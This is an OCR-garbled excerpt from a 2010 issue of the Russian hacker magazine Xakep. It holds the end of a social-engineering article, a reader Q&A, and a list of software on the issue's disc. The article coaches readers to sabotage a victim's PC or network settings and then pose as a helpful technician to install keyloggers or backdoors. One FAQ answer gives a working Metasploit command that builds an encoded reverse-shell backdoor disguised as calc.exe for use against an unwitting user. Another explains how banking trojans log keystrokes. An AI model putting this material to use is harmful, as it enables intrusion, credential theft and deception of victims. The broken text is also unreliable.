книги хакеры / журнал хакер / 138_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ФИШИНГ И ФАРМИНГ
Фишинг (phishing, от англ. fishing — рыбалка, выуживание) — это попытка заманить жертву на фейк-сайт, в точности повторяющий оригинальный, где она вводит свои логин и пароль. Эти данные получают мошенники, пользуясь ими на свое усмотрение.
Фарминг (farming — занятие сельским хозяйством. Не ищи логику в названии. Социнженеры — ребята с юмором, назвали этот вид мошенничества по аналогии с фишингом) — с помощью подложного DNS-сервера или модифицированного файла HOSTS происходит перенаправление жертвы по ложному адресу.
схеме(делаюакцентнаслове«шаблонной», посколькукаждыйслучайиндивидуален, ив схемемогутбытьотклонениявпользууспешностидела):
1.Диверсия;
2.Реклама;
3.«Помощь».
То есть ты каким-либо образом создаешь обратимую проблему на компьютере потенциальной жертвы (диверсия). Она в отчаянии не знает, что делать и куда можно обратиться за помощью. И тут невзначай появляешься ты, демонстрируя свои знания в решении этой проблемы (реклама). Жертва слезно умоляет
флешек, сумнымвидомсадишьсязакомпьютер. Еслихозяинсамнедогадаетсяугоститьтебя чаем/пивом, твоязадачанамекнутьему:). Пока владельцакомпьютеранебудетвкомнате— займисьсамымипалевнымимоментами. Вобщем, дальнейшиедействияпонятныизависятот конечныхцелей: либонахождениеконфиденциальныхданных, либоустановкакейлоггераи просьбаввестилогин-парольсцельюпроверки работысайтаит.п.
ОднимизсложныхмоментовОСИявляетсятщательнаяподготовкакатаке. Тебенужнособратьи проанализироватькакможнобольшеданных обудущейжертве: ееоперационнуюсистему,
Схему атаки ОСИ можно разнообразить, например, рекламу провести до диверсии, тогда все будет выглядеть еще более непринужденно и спонтанно.
тебя помочь ей в починке любимого компа, и в этот момент ей даже в голову не придет мысль, что ее могут обманывать или получать доступ к личным данным. Этот факт дает относительную свободу действий социнженеру. Итак, ты приходишь к жертве (или она сама к тебе приходит со своим ноутбуком), а дальше под видом устранения проблемы действуешь в зависимости от целей: кейлоггеры,
бэкдоры, batch/VBScript/JScript-сценарии
— что угодно. И сделать это не так сложно, поскольку что конкретно ты переписываешь с флешки или на флешку, ламер вряд ли поймет.
Например, тыякобыслучайнознакомишьсяс будущейжертвойвICQ, впроцессеразговора упомянувотом, чтоутебяестьдруг, отличный спецвкомпьютерныхтехнологиях. Дальшепод видомкакой-нибудьфишкидля«Вконтакте» или архивафотографийвпариваешьемупрограмму, котораясильнозагружаетпамятьитормозит работукомпьютера. Гдеискатькорнипроблемы, юзер-жертванезнает. Будетлогично, еслион обратитсяктебезаконтактамидруга-IT’шника. Еслионневспомнитонем— твоязадача аккуратнонапомнить, обещаядоговоритьсяо бесплатнойпомощи. Дальшежертвазвонитили пишетдругу(тоесть, опятьтебе). Тыприходишь, приносишьссобоймногоразныхдисков,
браузер(см. раздел«Анализрабочегостола»), интересы, приблизительныйуровенькомпьютерныхзнанийит.п.
Какяужеговорила, схемуатакиОСИможно разнообразить, например, рекламупровести додиверсии, тогдавсебудетвыглядетьеще болеенепринужденноиспонтанно. Также можнофорсироватьобращениезапомощью. Пример: тызвонишьжертведомой, представившисьтехспециалистомкомпаниипровайдера(заблаговременноузнаешь ееназвание, возможныехарактеристики
оказываемыхуслуг, настройкисети). Сообщаешьотом, чтовсвязиснекоторымиизмененияминеобходимосменитьнастройкисети, просишьоткрытьнужныйраздел, диктуешь новыенастройки(темсамымсбиваяих). После введенияновыхпараметровинтернет, естественно, перестаетработать. Дляпроформы перебираешьещенескольковариантов настроек, иниоднаизнихнедолжнаспасти возникшуюситуацию. Тогдатыговоришь: «Бу- детелиВыдомаещевтечение10-15 минут? Сейчасподойдетспециалист». Итутглавное сработатьоперативно, чтобыжертва, изнывая отнетерпения, непозвониладействующему провайдеру. Тыприходишь, копаешьсявсистеме, устанавливаешьправильныерабочие настройки, заодноустанавливаякакую-нибудь
программудляперехватавводимыхданных илиорганизацииудаленногодоступа. После этогопросишьпроверитьпочту, какой-нибудь сайт… Вобщем, действуешьсогласносвоим целям. Оченьудобното, чтодажееслижертва умнаиотносительнонеламер, вмоментполомкиееголовабудетзанятарешениемпроблемы, анепоискомнесоответствийвтвоем неожиданномпоявлении. Именнопоэтому нужнохорошоподготовиться, чтобыпровести беспроигрышнуюдиверсию.
Итак, говоряобобратнойсоциальнойинженерии, следуетучитыватьто, чтоподготовка
катакеболеесложна, требуетпродумывания
имножествазапасныхвариантов. Новитоге онаобеспечиваетболеевысокуюрезультативность, исамоеглавное— жертвавконце останетсятебеблагодарна. Аэтодаетвысокийпроцентповторногообращенияза«помощью». Особенновыгодноиметьтакогодруга напредприятии: влюбоймоменттыможешь позвонитьипоинтересоваться, невозникает литехническихпроблем, непыталисьлизлоумышленникипроникнутьвсистему. Другими словами, тыконтролируешьситуациюнавсех этапах.
Заключение
В целом, глядя на вышеописанные методы работы, можно сказать, что четкой схемы всетаки нет. Социальная инженерия — это стиль мышления, а не наука. Если выработаешь в себе нужные механизмы подхода к ситуации, жертве, обстоятельствам, то сможешь эффективно использовать для своей выгоды. Все это постигается не сразу, а с опытом. Наблюдай, пробуй, повторяй уже совершенные «подвиги» — и со временем увидишь, что уже готовые схемы начнут получаться легче, появятся свои собственные уникальные идеи.
Подконецхочусказатьонекоторыхустановках, которыеопределяютуспешностьсоциального инженера:
1.Человеческийфактортакиработает. Если программаограниченарамкамидопустимых значений, тоэкспериментысчеловеческой психикойограниченытольконашимнезнанием еепроцессов.
2.Избавляйсяоткомплексов, шаблонови стереотиповмышления. Этопоможетэффективноиспользоватьиманипулироватьчужими стереотипами.
3.Учисьобщатьсясвободноиуверенно. Тыне сможешьубедитьчеловека, еслисамнебудешь уверенвтом, чтоделаешьиговоришь. Такженеплохобудетнаучитьсяречевымамортизациям (почитайпоэтойтемекнигу«Психологическое айкидо» МихаилаЛитвака).
4.Небойсяэкспериментировать. Невсегда всеполучаетсяспервогораза. Опытприходит
сошибкамииколичествомпрактики. Вэтом планенеудачныйопытценитсядажебольше, чемуспешный. Главное— научисьанализироватьсвоиошибкисучетомчеловеческого фактора.z
XÀÊÅÐ 07 /138/ 10 |
139 |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
UNITS |
|
|
|
|
|
|
|
|
|
|
|
||
w |
|
|
|
|
|
|
|
|
|||
w Click |
|
|
|
|
|
o |
m |
||||
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
|
p |
|
|
|
|
gАнтон «ant» Жуков |
|||
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-xcha |
|
|
Степан Ильин |
|||
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
faq
united@real.xakep.ru
Q: Вовремяреверсингачастонужноподсмотреть, чтоозначаеттотилиинойпараметр, передаваемыйвAPI-функцию. ЗаобъяснениемобычнообращаюсьвMSDN, ноэтодолгои неудобно. Можноликак-тонаучитьIDA, чтобыта добавляларасширенныекомментарииквход- нымпараметрамAPI-функций?
А:Действительно, запомнитьвходныепараметры, авместестемещеивозвращаемыезначения многочисленныхAPI — задача, мягкоговоря, непосильная. Чтобыупроститьсебежизнь, парни изzynamics.com написалиida-msdn-скрипт (взятьможноотсюда: github.com/zynamics/msdn- plugin-ida), которыйдобавляетисчерпывающую информациюизMSDN длякаждоговызоваAPIфункции— этокакразто, чтонамнужно. Правда, сначалапридетсясконвертироватьтвоюлокальноустановленнуюбиблиотекуMSDN вXML-файл. Сделатьэтоможноспомощьютулзыmsdncrawler (github.com/zynamics/msdn-crawler),
котораяпарситбиблиотекуMSDN игенерирует XMLфайл, содержащийинформациюобAPIфункцияхWindows (описание, именааргументов вместесописанием, возвращаемыезначения). Всегонаданныймоментmsdn-crawler находит 33984 (!) функции. Сформировавфайлmsdn.xml, остаетсятолькодобавитьизнегоинформацию вIDB-файл, которыйпонимаетсамаIDA. Для этогоиспользуемIDAPython ивыполняемсего помощьюскриптida_importer.py.
Q: ДовольночастоиспользуюTor длясохранения анонимности. Но, какизвестно, существуюттакиеутилитыкакsslstrip, позволяющиеперехватитьмоиданныенапоследнемузле, откудаони передаютсявСетьвоткрытомвиде. Можноли как-тосебяобезопаситьотподобноготипаатак?
A: Обезопаситьсебянавсе100% неполучится, нокое-какиемерывсежепредпринять можно. ВпакетутилитыTorTunnel (www. thoughtcrime.org/software/tortunnel) входит программаподназваниемTorScanner. Она особымобразомопрашиваетвсевыходные ноды, полученныеотсерверадиректорий, послечеговыводитнебольшойотчет, на какихузлахбылпереходсHTTPS наHTTP: torscanner host port / > dump.txt. Далее, если внестиподозорительныеузлывкачестве значенияпараметраExcludeNodes, тоTor исключитихприпостроениицепочекнодов. Идеяхорошая, нонедостатокочевиден: атакующийможетпоявитьсявнезапно, перехватитьтрафикиисчезнуть. Поэтомуэтотспособ
инедает100% гарантии.
Q:ХочупроверитьSWF-файлынаналичие вредоносногокода. Подскажиутилиту, которая лучшевсегоподходитдлядекомпиляцииFlashфайлов.
A:ВСетиестьмножествобесплатныхутилит длядекомпиляцииFlash-файлов, например знаменитыеFlare иOWASP's SWFIntruder. К
сожалению, возможностибесплатныхутилитне всегдаидутвногусовременем, поэтомуочень многиеизнихнеподдерживаюттенововведения, которыепоявилисьв9 и10 Flash’e, ActionScript 3 ифреймворкеAdobe Flex. Самой жепродвинутойутилитойнаданныймоментяв-
ляетсяHP SWFScan (www.hp.com/go/swfscan).
Этоперваяиединственнаябесплатная программа, умеющаяработатьсActionScript 2.0
иActionScript 3.0. Программаумеетнепросто декомпилироватьбайкодобратновисходный код— онасозданаспециальнодляпоиска
уязвимостейвоFlash-приложениях. Всегореализованообнаружениеболее60 разныхуязвимостей, включаяраскрытиеперсональных данных, XSS, междоменноеповышениепри-
вилегий(cross-domain privilege escalation) и
др. HP SWFScan примечательнаещеитем, что подсвечиваетнайденныевкодеуязвимости, предоставляетрекомендациииисчерпывающуюинформациюпоуязвимости, атакжеможет экспортироватьисходныйкоддлядальнейшего анализавстороннихприложения.
Q:Можноликак-топеренестизакладкииз
Firefox вOpera илиChrome?
A:Естьтакаязамечательнаяпрогакак
Transmute (www.gettransmute.com), кото-
руюможносмеломожноназватьстандартом де-фактодлясинхронизациизакладокмежду различнымибраузерами. Фишкавтом, чтопрогаподдерживаетработунетолькосбразуерами
(Firefox, Google Chrome, Opera, Internet Explorer
идругими), ноещеисонлайн-сервисамидля хранениязакладок. Правда, длясинхрониза-
циисGoogle Bookmarks, Delicious идругими хранилищамизакладокпридетсяприобрести платнуюверсию.
Q:Естьмного-многокоданаJavaScript скомментарияминакитайскомязыке. Задача— удалить оттудавсекомменты. Написалнесколькорегулярок, нонекоторыевещипрограммавсеравно пропускает. Аувасестьрешение?
A:Вбольшинствеслучаевбудетдо-
статочнопростогорегеспаcode. replace(/\/\*.+?\*\/|\/\/.*(?=[\n\r])/g, '').
Но, увы, оннесможетобработатьследующие ситуации:
140 |
XÀÊÅÐ 07 /138/ 10 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Q: Можнолиотменитьслучайноотправленное письмо?
A: Внекоторыхслучаях— да! Уверен, чтоесли тыинепользовалсяGmail, то, поменьшей мере, обращалвниманиенакнопкуUndo, котораядоступнавтечениенекотороговремени послеотправкиписьма. Время, втечениекоторогописьмонаходитсявовременномбуфере ифизическинеотправляется, варьируетсяот 5 до20 секундирегулируетсявнастройках. ПользователиOutlook, работающиевсвязке сExchange-серверомтакжемогутотозвать письмо, воспользовавшисьсоответствующим пунктомвменю«Другиедействия».
|
|
Q: ХочупоэкспериментироватьсRFID. Всмысле, |
|
|
несобиратьсчитывательилиэмуляторметок |
|
|
снуля, аименноинтегрироватьеговрамках |
|
|
какой-нибудьинформационнойсистемы. На- |
|
|
пример, повеситьRFID-меткунаошейниккошки |
|
|
иотслеживатьееперемещенияпоквартире, |
|
|
записываяcheck-in влог-файл. Поидеи, ничего |
|
|
сложноговэтомнет, еслиестьметкииRFID-счи- |
Программировать на Python теперь можно в Visual Studio |
тыватели. Подскажи, гдеихдостатькакможно |
|
дешевле? |
||
|
|
A:Хорошийвектортывыбралдляэкспериментов, |
|
|
молодец! Темболеесейчаскакникогдаранеевсе |
1. var str = " /* not a real comment */ "; |
• разработкавспомогательныхплагиновк |
необходимыеинструментысталидоступными. |
2. var regex = /\/*.*/; |
браузерам(Firefox/Chrome); |
ПокупатьRFID-оборудованиевРоссии— невы- |
Чтобыудалитьабсолютновсекомментарии, |
• интерфейсLSP (Layered Service Provider), |
годно. Наширазработки— дорогие, ате, чтовезут |
длятакихситуацийпридетсянаписатьнеслож- |
позволяющийпользователюподключать |
сКитая, продаютсявтридорога. Поэтомусамый |
ныеобработчики. |
собственныеDLL-библиотекидляобработки |
верныйспособ— заказатьвсесамомугде-нибудь |
|
вызововWinsock API. |
зарубежом. Еслипосерфитьтакиесайты, как |
Q: ПризапускепоследнейверсииBacktrack на |
Самый банальный вариант: троян от- |
www.dealextreme.com, гдепродаетсямиллион |
широкоформатномноутбукеустанавливается |
слеживает определенную комбинацию в |
товаровкитайскойпромышленности, можно |
неправильноеразрешение. Какэтопофиксить? |
названиях окон (например, «Super Bank») и |
найтиNoName считывателиRFID поценеот$40. |
A: НамоемстаромAsus помоглодобавление |
таким образом понимает, что пользователь |
Какправило, вкомплектеидетодна-двеметки |
парыстрочеквконфиг/etc/X11/xinit/xinitrc: |
перешел на сайт банка, а после этого тупо |
дляэкспериментов. Увы, отвечатьзакачество |
|
записывает в лог все клики и нажатия на |
какого-токонкретноготоваразатакуюстоимость |
xrandr –output HDMI-2 –offxrandr |
клавиатуре. |
никтонеможет. Авотчтодействительномогупо- |
–output VGA –off |
|
|
xrandr –output HDMI-2 –off |
Настраиваем тулзу для поиска потерянного ноутбука |
|
xrandr –output VGA –off |
||
|
|
|
Послеэтогоизображениесталовыглядеть какнадо.
Q: Какбанковскиетрояныопределяют, что пользовательперешелнанужныйимсайт(а нуженим, какнесложнодогадаться, интерфейс онлайн-банкинга)?
A: Еслиговоритьпросто, тотроянунужно отслеживать, чтоделаетвеб-браузерпользо- вателяинакакиестраницыонпереходит. Для определенияпереходананужныйсайтиспользуютсядовольноразнообразныеприемы:
• перехватAPI-функции(впервуюочередь, WinInet API);
• интерфейсBHO (Browser Helper Object) — DLL-модуль, разработанныйкакплагиндля Internet Explorer дляобеспечениядополнительнойфункциональности;
• мониторингназванияокон(спомощью банальнойAPI-функцииFindWindow);
• работасCOM (Component Object Model) / OLE (Object Linking and Embedding) интерфейсами;
XÀÊÅÐ 07 /138/ 10 |
141 |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
o |
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-xcha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
UNITS
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Качественный RFID-считыватель и набор меток за $52
советоватьпосвоемуопыту, такэтоRFID-модуль отизвестнойкомпанииParalax (www.parallax. com), которыйподключаетсяккомпьютеручерез серийный/USB порт. Товарможнокупитьпрямо насайтепроизводителя(ищипоключевым словамRFID Card Reader) поценеот$39,99 за штуку. Меткипридетсяпокупатьотдельно: одна RFID-карточкастоит$0,99.
Q: Укралиноутбук. ДалмилицииMAC-адрес, но учитывая, чтовгородемногопровайдеров, шанс найтиноутпоэтимданнымнебольшой. Хочу теперьпоставитьнавсесвоиноутбукикакуюнибудьпрограмму, котораяпостояннобудетстучатьсянасерверисливатьтудатекущуюинфу (скажем, IP-адрес). Втакойситуациипоймать подонковбудеткудапроще. Нокакэтолучше всегосделать?
A: Сампонимаешь, чтонаписатьпрограмму, которая, скажем, призапускебудетотправлять текущийIP-адрес, ничегонестоит. Ноэтого мало! ВнетбукахсейчасестьGPS — значит, можноотправлятьикоординаты. Пускайтакого модулянет, нопопараметрамточкидоступа Wi-Fi (MAC иESSID) зачастуютакжеможно определитьместорасположение(покрайней мере, Google.Картытакоепозиционированиемогутвыполнятьоченьздорово). Еслив ноутбукеестькамера, топочемубынесделать снимокскамерыинеотправитьегонасервер
— возможно, повезетувидетьнегодяявлицо. Влюбомслучаениктонемешаетотправить скриншотрабочегостола— туттожеможет бытьважнаяинформациядляпоискабука. Не нужнодаженичегокодитьвручную, потомучто всеэтидействияподдерживаютсяпрограммой Prey (preyproject.com). Версияутилитыужеесть длявсехдесктопныхплатформ: Windows, Mac иLinux, асовсемнедавнопоявиласьверсияи дляAndroid. СопределенныминтерваломPrey просыпаетсявсистемеистучитнаопределенныйURL, чтобыпроверить, непоявилась литамкоманданасборданных. Еслирежим поискаактивирован, тоонасамабудетпытаться
подключитьсякближайшемуWi-Fi (дажеесли злоумышленникэтогоделатьнебудет). Аизображениескамерывнекоторыхслучаяхбудет сниматьсянезаметно, тоестьбезвизуального оповещения(обычнорядомскамеройесть небольшойсветодиод).
Q:МожноликVisual Studio прикрутитьподсветку синтаксисаPython?
A:Можносделатьдажебольше. Снедавнего времениврамкахпроектахIronPython (это реализацияPython дляплатформы.Net) были опубликованыспециальныеинструментыдля работысPython-кодомвVisual Studio 2010.
Врезультатетыполучаешьмногиебонусы, которыепредоставляетIDE отMicrosoft, дляразработкикоданаPython, втомчисле
отладчик(хотяинетакоймощныйкакдляC#) и знаменитуюIntelliSense — системуподсказоки автодополнениякоманд.
Q:Подскажисамыйпростойспособоткрыть шеллнаудаленнойWindows-системеушастого пользователя.
A:Небудутутприводитьпримерымногочисленныхджоинеров, позволяющихприсоединитькневинномуexe’шникузловредныйкод. Можнообойтисьибезджоинера, и, собственно, безсамогобэкдора, заменивобоих Metaspoit'ом. Воднойизпоследнихверсий появиласьзамечательнаякомандаmsfencode, котораяприсоединяеткпроизвольномубинарникуоднуизбоевыхнагрузокMetasploit, втом числеbackconnect:
./msfpayload windows/meterpreter/ reverse_tcp LHOST=<òâîé ip> R | ./ msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ ga_nai -c 5
Еслиполучившийсяexe-файлзапуститьна удаленнойсистеме, тоснеетотчасжепоступит обратноесоединение.
Q:Хочуавтоматизироватьнуднуюработу, связаннуюсзаполнениемданныхвExcel-файл (*.XLS). Данныенеобходимообновлятьиз скрипта, написанногонаPython. Как?
A:Естьдваварианта. Использоватьготовые модули, например, Pyxlreader (pyxlreader. sourceforge.net), илижевоспользоваться технологиейCOM, спомощьюкоторойполучать данныесExcel напрямую(работатьсфайлом будетсамофисныйпакет). Второйвариант болеесложениктомужедобавляетобязательнуюзависимостьскриптаотустановленногов системеExcel.
Q:Чтонужнознать, чтобыреверситьприложе-
ниядляiPhone?
A:ВсеприложениядляiPhone имеютсвой форматисполняемыхфайлов— Mach-O. При этомсамоприложениераспространяетсяв видеIPA-файла— zip-архива, вкоторомупаковансамбинарник, атакжефайлы-ресурсы. Длятого, чтобыподнятьнателефонеусловия дляотладки, необходимдевайс, накотором установленJailBrake (тоестьдолженбыть рутовыйдоступкфайловойсистеме). После этогоутебябудетдоступкотладчикамgdb/ iphonedbg. ПриложенияизAppStore закриптованы: дешифрованиеосуществляетсязагруз- чикомMach-O. Защитанеслишкомсложная, кудабольшепроблемдоставляеттотфакт, что основнымязыкомразработкиприложенийяв- ляетсяObjective-C. Комплируемыйобъектноориентированныйязыкпрограммированияот корпорацииApple построеннаосновеязыка СиипарадигмSmalltalk. Последнееозначает, чтовсемобъектампосылаютсясообщения.
Врезультатебольшаячастьвызовов(>80%) программывыгодяткакobjc_msgSend(). Переваритьихбездополнительногопомощника довольносложно, однакографвызововможно серьезноупроститьипривестивбожеский видспомощьюскриптаzynamics Objective-C helper (github.com/zynamics/objc-helper- plugin-ida), подключаемогокIDA Pro ввиде плагина.
Q:Вомногиетелефонысейчасвстроенмодуль
A-GPS (Assisted GPS). Системаподгружаетиз инетаданные, необходимыедлябыстрого поискаспутника. Получается, чтодлязапуска GPS всегдануженинет?
A:Насамомделенет, Assisted GPS — это лишьсистема, ускоряющаятакназываемый «холодныйстарт» GPS, тоестьпроцесспервоначальногопоискаспутника. Частьнеобходимыхданных, втомчислеальманахстекущим расположениемспутников, подгружается втелефонииспользуетсядляпервичного определениякоординат. Есливозможности подгрузитьданныенет, тоGPS-модульрабо- таетвобычномрежиме: какеслибыA-GPS в
системенебыло. Впрочем, отдельныеприем- никисA-GPS безоператорасотовойсвязи работатьвсеженемогут, ноэтоисключение, а неправило.z
142 |
XÀÊÅÐ 07 /138/ 10 |
>>WINDOWS
>Development
Visual Studio 2010 Express
The Regex Coach 0.9.2
OllyDbg 2.0
Regulator 2.0
Regulazy 1.03
{smartassembly} 4.2
RJ TextEd 6.40
Аддоны для Visual Studio
VisualSVN Server 2.1.2
VisualSVN 2.0.1
Visual Assist X 2010
TestDriven.NET 3.0 Personal
StyleCop 4.3.3.0
ReSharper 5.0
NUnit 2.5
GhostDoc 2.5
DPack 3.0.3 for Visual Studio 2010
CruiseControl.NET 1.5
CodeRush 2010.1.4
Расширения для Visual Studio
Go To Definition 2.1
Triple Click 2.0
Hide Main Menu
ItalicCommentsFree 2.0
MoveToRegionVSX
Word Wrap with Auto-Indent 1.0
Regex Editor 1.5
GradientSelection 2.0
Selection Foreground 0.1
StructureAdornmentFree 1.9
Highlight all occurrences of selected word 1.31
Find Results Highlighter 1.0
Visual Studio Background
Customizer 1.0
Visual Studio Color Theme Editor 1.0
IntelliSense Presenter 1.5
>Misc
Prey 0.3.7
win7stack 0.80
GiMeSpace Free Edition 1.0.4.6
GetFoldersize 2.2.10
AllDup 3.0.2
RBTray 4.1
FLV Extract 1.6.0
Writespace 1.4
OnTopReplica 2.9.3
Ditto-cp 3.16.8
TeraCopy 2.12
Grow 2.0.3
PrintConductor 1.5
ViGlance OneStep V1
UltraSearch 1.3
1Password for Windows 1.0 beta
Clavier+ 10.6.1
PREDATOR 2.2.0
TouchFreeze 1.0.2
>Multimedia
VideoInspector 2.2.4.123
REAPER 3.52
mflow
RasterVect Free Edition 16.0
tinti 2.2.2
Taffy 0.5.0beta
VidCoder 0.41
Inkscape 0.47
Similarity 1.3
Free Audio Editor 2010
>Security
Webreak beta 0.1.1
MetaGooFil 1.4b
theHarvester 1.6
WebSlayer Beta
ProxyStrike 2.2
Sqlninja 0.2.5
Lansweeper 4.0
FUU 0.1beta
Malware Check Tool 1.0
Aircrack-ng 1.1
SIP Inspector 1.10
Blazentoo 0.1b
ThreatFactor NSIA
WhatWeb 0.4.3
Safe3 SQL Injector 6.2
ExploitMyUnion 2.1
iScanner 0.6
Yara 1.4
Harden SSLTLS beta
WebCruiser 2.3.2
FoxAnalysis 1.4.2
ChromeAnalysis 1.0.1
Watcher 1.4.0
Vera 0.1
>Net
FriendSea Presenter 1.2.0.6
NetSetMan 3.0.3
HomePipe
NetBalancer 1.0
TweetMyPC 3
Firewall Builder 4.0
inSSIDer
RFIDIOt 1.0a
Odysseus 2.0.0.84
Tinc 1.0.13
KpyM TelnetSSH Server 1.18b
USB to Ethernet 3.0.6
>System
Guru3D - Driver Sweeper
Explorer++ 1.1
Splunk 4.1.2
CrystalDiskMark 3.0.0d
LogLady 1.1
Sikuli IDE 0.10.1
RegFromApp 1.21
DOSBox 0.74
Soluto 1.0.721.0
VirtualBox 3.2 beta1
PC-Wizard 2010.1.94
Kiwi 1.4.2
FreeFileSync 3.7
HFSExplorer 0.21
Kaspersky CRYSTAL 9.0
ESET NOD32 4.2
>>UNIX
>Desktop
Banshee 1.7.1
